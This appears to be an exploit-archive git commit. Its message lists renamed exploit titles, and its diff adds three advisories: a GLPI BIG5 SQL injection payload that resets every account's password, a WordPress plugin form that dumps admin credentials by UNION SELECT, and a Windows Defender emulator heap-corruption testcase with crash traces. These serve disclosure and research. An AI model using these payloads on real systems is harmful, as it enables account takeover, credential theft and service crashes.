Multiple File Inclusion Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions Waibrasil - Remote File Inclusion / Local File Inclusion Waibrasil - Local/Remote File Inclusion Spaw Editor 1.0 / 2.0 - Arbitrary File Upload Spaw Editor 1.0/2.0 - Arbitrary File Upload PHP SETI@home Web monitor - (PHPsetimon) Remote File Inclusion / Local File Inclusion PHP SETI@home Web monitor - 'PHPsetimon' Local/Remote File Inclusion vBulletin(R) 3.8.6 - faq.php Information Disclosure vBulletin 3.8.6 - 'faq.php' Information Disclosure Open Realty 2.x / 3.x - Persistent Cross-Site Scripting Open Realty 2.x/3.x - Persistent Cross-Site Scripting vBulletin 3.8.4 / 3.8.5 - Registration Bypass vBulletin 3.8.4/3.8.5 - Registration Bypass vbShout 5.2.2 - Remote / Local File Inclusion vbShout 5.2.2 - Local/Remote File Inclusion Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload Zoopeer 0.1/0.2 - 'FCKeditor' Arbitrary File Upload xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload xt:Commerce Shopsoftware 3/4 - 'FCKeditor' Arbitrary File Upload CakePHP 1.3.5 / 1.2.8 - Unserialize() CakePHP 1.3.5/1.2.8 - 'Unserialize()' Exploit vBSEO 3.5.2 / 3.2.2 - Persistent Cross-Site Scripting via LinkBacks vBSEO Sitemap 2.5 / 3.0 - Multiple Vulnerabilities vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities Geomi CMS 1.2 / 3.0 - SQL Injection Geomi CMS 1.2/3.0 - SQL Injection cChatBox for vBulletin 3.6.8 / 3.7.x - SQL Injection cChatBox for vBulletin 3.6.8/3.7.x - SQL Injection Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution (Metasploit) Redmine SCM Repository 0.9.x/1.0.x - Arbitrary Command Execution (Metasploit) vBulletin - misc.php Template Name Arbitrary Code Execution (Metasploit) vBulletin - 'misc.php' Template Name Arbitrary Code Execution (Metasploit) CakePHP 1.3.5 / 1.2.8 - Cache Corruption Exploit (Metasploit) CakePHP 1.3.5/1.2.8 - Cache Corruption Exploit (Metasploit) SmarterMail 7.3 / 7.4 - Multiple Vulnerabilities SmarterMail 7.3/7.4 - Multiple Vulnerabilities WordPress Plugin BackWPup - Remote Code Execution /Local Code Execution WordPress Plugin BackWPup - Remote Code Execution / Local Code Execution WebSVN 2.3.2 - Unproper Metacharacters Escaping exec() Remote Command Injection WebSVN 2.3.2 - Unproper Metacharacters Escaping 'exec()' Remote Command Injection LuxCal Web Calendar 2.4.2 / 2.5.0 - SQL Injection LuxCal Web Calendar 2.4.2/2.5.0 - SQL Injection Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit) Joomla! Component 'com_virtuemart' 1.1.7/1.5 - Blind Time-Based SQL Injection (Metasploit) WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities Family Connections CMS 2.5.0 / 2.7.1 - 'less.php' Remote Command Execution WSN Classifieds 6.2.12/6.2.18 - Multiple Vulnerabilities Family Connections CMS 2.5.0/2.7.1 - 'less.php' Remote Command Execution Typo3 4.5 < 4.7 - Remote Code Execution (Remote File Inclusion / Local File Inclusion) Typo3 4.5 < 4.7 - Remote Code Execution / Local File Inclusion / Remote File Inclusion phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit) phpMyAdmin 3.3.x/3.4.x - Local File Inclusion via XXE Injection (Metasploit) Log1 CMS - writeInfo() PHP Code Injection (Metasploit) Log1 CMS - 'writeInfo()' PHP Code Injection (Metasploit) MiniCMS 1.0 / 2.0 - PHP Code Inject MiniCMS 1.0/2.0 - PHP Code Injection 4Images 1.7.6-9 - Cross-Site Request Forgery / Inject PHP Code 4Images 1.7.6-9 - Cross-Site Request Forgery / PHP Code Injection FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities FreePBX 2.9.0/2.10.0 - Multiple Vulnerabilities FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit) FreePBX 2.9.0/2.10.0 - 'callmenum' Remote Code Execution (Metasploit) Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection Woltlab Burning Board 2.2/2.3 [WN]KT KickTipp 3.1 - SQL Injection SugarCRM CE 6.3.1 - Unserialize() PHP Code Execution (Metasploit) webERP 4.08.1 - Local / Remote File Inclusion SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit) webERP 4.08.1 - Local/Remote File Inclusion Tiki Wiki CMS Groupware 8.3 - Unserialize() PHP Code Execution (Metasploit) Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit) House Style 0.1.2 - readfile() Local File Disclosure House Style 0.1.2 - 'readfile()' Local File Disclosure OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting OTRS Open Technology Real Services 3.1.8/3.1.9 - Cross-Site Scripting ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Persistent Cross-Site Scripting ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting airVisionNVR 1.1.13 - readfile() Disclosure / SQL Injection airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities Kerio Control Unified Threat Management 9.1.0 build 1087/9.1.1 build 1324 - Multiple Vulnerabilities IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection Alt-N MDaemon 12.5.6/13.0.3 - Email Body HTML/JS Injection parachat 5.5 - Directory Traversal Parachat 5.5 - Directory Traversal DCP-Portal 3.7/4.x/5.x - calendar.php Multiple Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'calendar.php' Multiple Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - announcement.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - news.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - contents.php cid Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting DCP-Portal 3.7/4.x/5.x - calendar.php HTTP Response Splitting DCP-Portal 3.7/4.x/5.x - 'calendar.php' HTTP Response Splitting UBBCentral UBB.Threads 6.2.3/6.5 - showflat.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - calendar.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - online.php Cat Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting phpVms Virtual Airline Administration 2.1.934 / 2.1.935 - SQL Injection phpVms Virtual Airline Administration 2.1.934/2.1.935 - SQL Injection phpMyAdmin 3.5.8 / 4.0.0-RC2 - Multiple Vulnerabilities phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities UBBCentral UBB.Threads 6.0 - editpost.php SQL Injection UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection Wifi Photo Transfer 2.1 / 1.1 PRO - Multiple Vulnerabilities Wifi Photo Transfer 2.1/1.1 PRO - Multiple Vulnerabilities File Lite 3.3 / 3.5 PRO iOS - Multiple Vulnerabilities File Lite 3.3/3.5 PRO iOS - Multiple Vulnerabilities IPB (Invision Power Board) 1.x? / 2.x / 3.x - Admin Account Takeover IPB (Invision Power Board) 1.x?/2.x/3.x - Admin Account Takeover UBBCentral 6.0 - UBB.threads Printthread.php SQL Injection UBBCentral UBB.Threads 6.0 - 'Printthread.php' SQL Injection Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x / 7.x) - Persistent Cross-Site Scripting Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting SPIP - CMS < 3.0.9 / 2.1.22 / 2.0.23 - Privilege Escalation SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation YaPiG 0.9x - Remote File Inclusion / Local File Inclusion YaPiG 0.9x - Local/Remote File Inclusion UBBCentral UBB.Threads 5.5.1/6.x - download.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - calendar.php Multiple Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - modifypost.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - viewmessage.php message Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - addfav.php main Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - notifymod.php Number Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - grabnext.php posted Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php' Local/Remote File Inclusion Xibo 1.2.2 / 1.4.1 - 'index.php' p Parameter Directory Traversal Xibo 1.2.2/1.4.1 - 'index.php' p Parameter Directory Traversal UBB.Threads 6.3 - showflat.php SQL Injection UBBCentral UBB.Threads 6.3 - 'showflat.php' SQL Injection Virtual Hosting Control System 2.2/2.4 - 'login.php' check_login() Function Authentication Bypass Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass ATutor 1.5.x - admin/fix_content.php submit Parameter Cross-Site Scripting ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting Mirapoint Web Mail - Expression() HTML Injection Mirapoint Web Mail - 'Expression()' HTML Injection Onpub CMS 1.4 / 1.5 - Multiple SQL Injections Onpub CMS 1.4/1.5 - Multiple SQL Injections ImpressPages CMS 3.6 - manage() Function Remote Code Execution ImpressPages CMS 3.6 - 'manage()' Function Remote Code Execution Coppermine Photo Gallery 1.4.10 - Multiple Remote File Inclusion / Local File Inclusion Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusion Dahua DVR 2.608.0000.0 / 2.608.GV00.0 - Authentication Bypass (Metasploit) Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit) UBB.Threads 6.1.1 - UBBThreads.php SQL Injection UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection WHMCompleteSolution (WHMCS) 4.x / 5.x - Multiple Web Vulnerabilities WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities Jenkins 1.523 - Inject Persistent HTML Code Jenkins 1.523 - Persistent HTML Code CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting CTERA 3.2.29.0/3.2.42.0 - Persistent Cross-Site Scripting UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection Drupal < 6.16 / 5.22 - Multiple Vulnerabilities Drupal < 5.22/6.16 - Multiple Vulnerabilities AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion AdvertisementManager 3.1 - 'req' Parameter Local/Remote File Inclusion Ultra Electronics 7.2.0.19 / 7.4.0.7 - Multiple Vulnerabilities Ultra Electronics 7.2.0.19/7.4.0.7 - Multiple Vulnerabilities net2ftp 0.98 (stable) - 'admin1.template.php' Local File Inclusion / Remote File Inclusion net2ftp 0.98 (stable) - 'admin1.template.php' Local/Remote File Inclusion MyBB 1.8.2 - unset_globals() Function Bypass / Remote Code Execution MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution WordPress Plugin Spellchecker 3.1 - 'general.php' Local File Inclusion / Remote File Inclusion WordPress Plugin Spellchecker 3.1 - 'general.php' Local/Remote File Inclusion Pimcore 3.0 / 2.3.0 CMS - SQL Injection phpList 3.0.6 / 3.0.10 - SQL Injection Pimcore 2.3.0/3.0 CMS - SQL Injection phpList 3.0.6/3.0.10 - SQL Injection Guppy CMS 5.0.9 / 5.00.10 - Authentication Bypass/Change Email Guppy CMS 5.0.9/5.00.10 - Authentication Bypass/Change Email UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting UBBCentral UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting OSClass 2.3.3 - 'index.php' getParam() Function Multiple Parameter Cross-Site Scripting OSClass 2.3.3 - 'index.php' 'getParam()' Function Multiple Parameter Cross-Site Scripting OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter exec() Call Arbitrary Shell Command Execution OpenEMR 4.1 - 'Interface/fax/fax_dispatch.php' File Parameter 'exec()' Call Arbitrary Shell Command Execution Fork CMS 3.x - backend/modules/error/actions/index.php parse() Function Multiple Parameter Error Display Cross-Site Scripting Fork CMS 3.x - 'backend/modules/error/actions/index.php' 'parse()' Function Multiple Parameter Error Display Cross-Site Scripting DedeCMS < 5.7-sp1 - Remote File Inclusion DeDeCMS < 5.7-sp1 - Remote File Inclusion WK UDID 1.0.1 iOS - Command Inject WK UDID 1.0.1 iOS - Command Injection MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion MindTouch DekiWiki - Multiple Local/Remote File Inclusions PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function PHP 5.5.9 - CGIMode FPM WriteProcMemFile Bypass Disable Function Western Digital My Cloud 04.01.03-421 / 04.01.04-422 - Command Injection Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection Belkin Router N150 1.00.08 / 1.00.09 - Directory Traversal Belkin Router N150 1.00.08/1.00.09 - Directory Traversal b374k Web Shell 3.2.3 / 2.8 - Cross-Site Request Forgery / Command Injection b374k Web Shell 3.2.3/2.8 - Cross-Site Request Forgery / Command Injection CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion CakePHP 2.2.8/2.3.7 - AssetDispatcher Class Local File Inclusion AlegroCart 1.2.8 - Local File Inclusion / Remote File Inclusion AlegroCart 1.2.8 - Local/Remote File Inclusion HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection HumHub 0.11.2/0.20.0-beta.2 - SQL Injection xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion xBoard 5.0/5.5/6.0 - 'view.php' Local File Inclusion qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion Atlassian Confluence 5.2 / 5.8.14 / 5.8.15 - Multiple Vulnerabilities Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities dotDefender Firewall 5.00.12865 / 5.13-13282 - Cross-Site Request Forgery dotDefender Firewall 5.00.12865/5.13-13282 - Cross-Site Request Forgery Chamilo LMS IDOR - (messageId) Delete POST Inject Chamilo LMS IDOR - 'messageId' Delete POST Injection WordPress Plugin Site Import 1.0.1 - Local File Inclusion / Remote File Inclusion WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities PQI Air Pen Express 6W51-0000R2/6W51-0000R2XXX - Multiple Vulnerabilities Novell ServiceDesk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities Novell ServiceDesk 6.5/7.0.3/7.1.0 - Multiple Vulnerabilities Totemomail 4.x / 5.x - Persistent Cross-Site Scripting Totemomail 4.x/5.x - Persistent Cross-Site Scripting Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload Untangle NGFW 12.1.0 Beta - execEvil() Command Injection Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials Micro Focus Filr 2 2.0.0.421 / 1.2 1.2.0.846 - Multiple Vulnerabilities Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities Trend Micro Deep Discovery 3.7 / 3.8 SP1 (3.81) / 3.8 SP2 (3.82) - hotfix_upload.cgi Filename Remote Code Execution Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution WebNMS Framework Server 5.2 / 5.2 SP1 - Multiple Vulnerabilities WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities Zabbix 2.2.x / 3.0.x - SQL Injection Zabbix 2.2.x/3.0.x - SQL Injection Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection Lepton CMS 2.2.0/2.2.1 - Directory Traversal Lepton CMS 2.2.0/2.2.1 - PHP Code Injection RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass RSS News AutoPilot Script 1.0.1/3.1.0 - Admin Panel Authentication Bypass Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection Oracle BI Publisher 11.1.1.6.0/11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 - XML External Entity Injection SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal WordPress Plugin Quiz And Survey Master 4.5.4 / 4.7.8 - Cross-Site Request Forgery WordPress Plugin Quiz And Survey Master 4.5.4/4.7.8 - Cross-Site Request Forgery Zoneminder 1.29 / 1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery RSS News AutoPilot Script 1.0.1 / 3.0.3 - Cross-Site Request Forgery RSS News AutoPilot Script 1.0.1/3.0.3 - Cross-Site Request Forgery Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit) OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit) OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit) OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit) Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit) Horde Groupware Webmail 3 / 4 / 5 - Multiple Remote Code Execution Horde Groupware Webmail 3/4/5 - Multiple Remote Code Execution Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities Alerton Webtalk 2.5/3.3 - Multiple Vulnerabilities I_ Librarian 4.6 / 4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting GLPI 0.90.4 - SQL Injection WordPress Plugin Ultimate Product Catalogue 4.2.2 - SQL Injection
This commit is contained in:
Offensive Security
parent
40b350e820
commit
28b54c9669
5 changed files with 1099 additions and 743 deletions
55
platforms/php/webapps/42262.txt
Executable file
55
platforms/php/webapps/42262.txt
Executable file
|
|
@ -0,0 +1,55 @@
|
|||
# Exploit Title: Multiple SQL injection vulnerabilities in GLPI 0.90.4
|
||||
# Date: 2016/09/09
|
||||
# Exploit Author: Eric CARTER (in/ericcarterengineer - CS c-s.fr)
|
||||
# Vendor Homepage: http://glpi-project.org
|
||||
# Software Link: http://glpi-project.org/spip.php?article3
|
||||
# Version: 0.90.4
|
||||
# Tested on: GLPI 0.90.4 running on a Debian 7, Apache 2.2.2, MySQL 5.5.49
|
||||
# CVE : CVE-2016-7508
|
||||
|
||||
Multiple SQL injection vulnerabilities in GLPI 0.90.4 allow an
|
||||
authenticated remote attacker to execute arbitrary SQL commands by
|
||||
using the [ELIDED] character when the database is configured to use
|
||||
asian encoding (BIG 5).
|
||||
|
||||
|
||||
|
||||
> [Affected Component]
|
||||
The file ./inc/dbmysql.class.php defines the encoding the database
|
||||
should use. This files uses the "SET NAMES" function which offers the
|
||||
possibility to use a specific encoding.
|
||||
|
||||
> [Attack Type]
|
||||
Remote
|
||||
|
||||
> [Impact Code execution]
|
||||
True
|
||||
|
||||
> [Impact Escalation of Privileges]
|
||||
True
|
||||
|
||||
> [Impact Information Disclosure]
|
||||
True
|
||||
|
||||
> [Prerequisite]
|
||||
The administrator of GLPI must have defined the variable
|
||||
$dbenc='big5' in ./config/config_db.php to support asian encoding. It
|
||||
will then be possible to do SQL injection in almost all the forms of
|
||||
the application.
|
||||
|
||||
> [Attack Vectors]
|
||||
For the proof-of-concept, the attacker targeted the
|
||||
"Surname" form input in the User profile by adding the characters
|
||||
ø (\xBF\x27) before the SQL code (the request must be sent using Western
|
||||
encoding) :
|
||||
ø', password=61529519452809720693702583126814 -- x
|
||||
|
||||
Once received by the server, the request will be sanitized, giving :
|
||||
ø\', password=61529519452809720693702583126814 -- x
|
||||
|
||||
The value will then be sent to the database with a BIG5 encoding. Here is the
|
||||
critical point, as BIG5 will see the string ø\ as a single asian character
|
||||
encoded on two bytes. As the single quote isn't escaped anymore, the
|
||||
SQL code will be executed and will set the password of every accounts
|
||||
to the value
|
||||
61529519452809720693702583126814 (=MD5 hash of "ximaz" string)
|
||||
44
platforms/php/webapps/42263.txt
Executable file
44
platforms/php/webapps/42263.txt
Executable file
|
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection – Plugin WordPress – Sql Injection
|
||||
# Exploit Author: Lenon Leite
|
||||
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
|
||||
|
||||
# Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/
|
||||
# Contact: http://twitter.com/lenonleite
|
||||
# Website: http://lenonleite.com.br/
|
||||
# Category: webapps
|
||||
# Version: 4.2.2
|
||||
# Tested on: Ubuntu 16.04
|
||||
|
||||
1 - Description:
|
||||
|
||||
Type user access: register user.
|
||||
|
||||
$_POST[‘CatID’] is not escaped.
|
||||
|
||||
http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/
|
||||
|
||||
2 - Proof of Concept:
|
||||
|
||||
1 – Login as regular user (created using wp-login.php?action=register):
|
||||
|
||||
2 – Using:
|
||||
|
||||
<*form method="post"
|
||||
action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories">
|
||||
<*input type="text" name="CatID" value="0 UNION SELECT
|
||||
user_login,user_pass FROM wp_users WHERE ID=1">
|
||||
<*input type="submit">
|
||||
|
||||
*delete “*” in code*
|
||||
|
||||
3 - Timeline:
|
||||
|
||||
- 22/05/2017 – Discovered
|
||||
- 24/05/2017 – Vendor not finded
|
||||
- **/06/2017 - Corrected
|
||||
|
||||
***Rename plugin txt to zip. Problem with gmail block.
|
||||
--
|
||||
*Atenciosamente*
|
||||
|
||||
*Lenon Leite*
|
||||
162
platforms/windows/dos/42264.txt
Executable file
162
platforms/windows/dos/42264.txt
Executable file
|
|
@ -0,0 +1,162 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1282&desc=2
|
||||
|
||||
In issue 1260 I discussed Microsoft's "apicall" instruction that can invoke a large number of internal emulator apis and is exposed to remote attackers by default in all recent versions of Windows. I asked Microsoft if this was intentionally exposed, and they replied "The apicall instruction is exposed for multiple reasons", so this is intentional.
|
||||
|
||||
This full system x86 emulator runs as SYSTEM, is unsandboxed, is enabled by default and remotely accessible to attackers.
|
||||
|
||||
I took a quick stab at writing a fuzzer and immediately found heap corruption in the KERNEL32.DLL!VFS_Write API, I suspect this has never been fuzzed before. A minimal testcase would be something like this:
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
MpApiCall("NTDLL.DLL", "NtControlChannel", 0xA); // Disable apicall limit
|
||||
|
||||
for (int i = 0; i < 16; i++) {
|
||||
MpApiCall("NTDLL.DLL", "VFS_Open", (uint64_t) L"filename", 0);
|
||||
MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", 0, 0);
|
||||
MpApiCall("NTDLL.DLL", "VFS_Write", i, (uint64_t) "data", -1, 0);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
I suspect the MutableByteStream object getting corrupted with an unchecked memcpy, I've seen multiple different stacktraces including wild eip.
|
||||
|
||||
See attachment for MpApiCall() implementation, and pre-compiled testcase, renamed testcase.txt. Note that as soon as the testcase.txt file touches disk, it will immediately crash the MsMpEng service on Windows, which may destabilize your system. The testcases have been encrypted to prevent crashing your exchange server.
|
||||
|
||||
This bug was found on Linux using Address Sanitizer:
|
||||
|
||||
$ ./mpclient extra/testcase.exe
|
||||
main(): Scanning extra/testcase.exe...
|
||||
EngineScanCallback(): Scanning input
|
||||
*** Error in `./mpclient': free(): invalid pointer: 0x0a5b4e50 ***
|
||||
Aborted (core dumped)
|
||||
|
||||
Then verified on Windows in MsMpEng.exe:
|
||||
|
||||
Critical error detected c0000374
|
||||
Break instruction exception - code 80000003 (first chance)
|
||||
ntdll!RtlReportCriticalFailure+0x29:
|
||||
001b:76fc3b6d cc int 3
|
||||
2: kd> kv
|
||||
ChildEBP RetAddr Args to Child
|
||||
0192e638 76fc4acd c0000374 76fdedd8 0192e67c ntdll!RtlReportCriticalFailure+0x29 (FPO: [Non-Fpo])
|
||||
0192e648 76fc4bad 00000002 777482b4 11109bb0 ntdll!RtlpReportHeapFailure+0x21 (FPO: [Non-Fpo])
|
||||
0192e67c 76f8a1dc 0000000c 00370000 11109bb0 ntdll!RtlpLogHeapFailure+0xa1 (FPO: [Non-Fpo])
|
||||
0192e76c 76f55950 0000cc5c 0000cc68 003700c4 ntdll!RtlpAllocateHeap+0x7b2 (FPO: [Non-Fpo])
|
||||
*** ERROR: Symbol file could not be found. Defaulted to export symbols for mpengine.dll -
|
||||
0192e7f0 66ac184e 00370000 00000008 0000cc5c ntdll!RtlAllocateHeap+0x23a (FPO: [Non-Fpo])
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
0192e808 668b60ef 0000cc5c 00000001 0cb26e40 mpengine!FreeSigFiles+0x1cb14e
|
||||
0192e858 6682c1a7 94741586 0cb26e40 11069948 mpengine!_rsignal+0x3479f
|
||||
0192e880 668266f5 947414e2 00000000 0192eb34 mpengine+0x20c1a7
|
||||
0192e9e4 668251ce 0192eb34 0cb26e40 00001000 mpengine+0x2066f5
|
||||
0192ea38 66822fd1 0cb26e40 109ee478 00001000 mpengine+0x2051ce
|
||||
0192eab0 66823127 0192eae0 0192eb34 00000000 mpengine+0x202fd1
|
||||
0192eba8 66822d18 0192ec00 0192ec54 00000000 mpengine+0x203127
|
||||
0192ec70 66823533 0192ec98 110c02e0 947411c2 mpengine+0x202d18
|
||||
0192ecc4 668244b5 110c02e0 947411fa 106bde30 mpengine+0x203533
|
||||
0192ecfc 66824593 110c02e0 94741382 00000000 mpengine+0x2044b5
|
||||
0192ee84 6682085f 0192f7dc 00000000 003e7cd8 mpengine+0x204593
|
||||
0192ee9c 6682088b 0192eeb8 66823dd2 0192f7dc mpengine+0x20085f
|
||||
0192eea4 66823dd2 0192f7dc 0192f7dc 947413be mpengine+0x20088b
|
||||
0192eeb8 66820829 0192f7dc 003e7cd8 66820790 mpengine+0x203dd2
|
||||
0192eed8 66823d4a 0192f7dc 00000000 9474121a mpengine+0x200829
|
||||
0192ef1c 6682d2a0 0192f7dc 0000800c 0192f7dc mpengine+0x203d4a
|
||||
0192ef30 668820be 947409ce 66881ba0 00370bf8 mpengine+0x20d2a0
|
||||
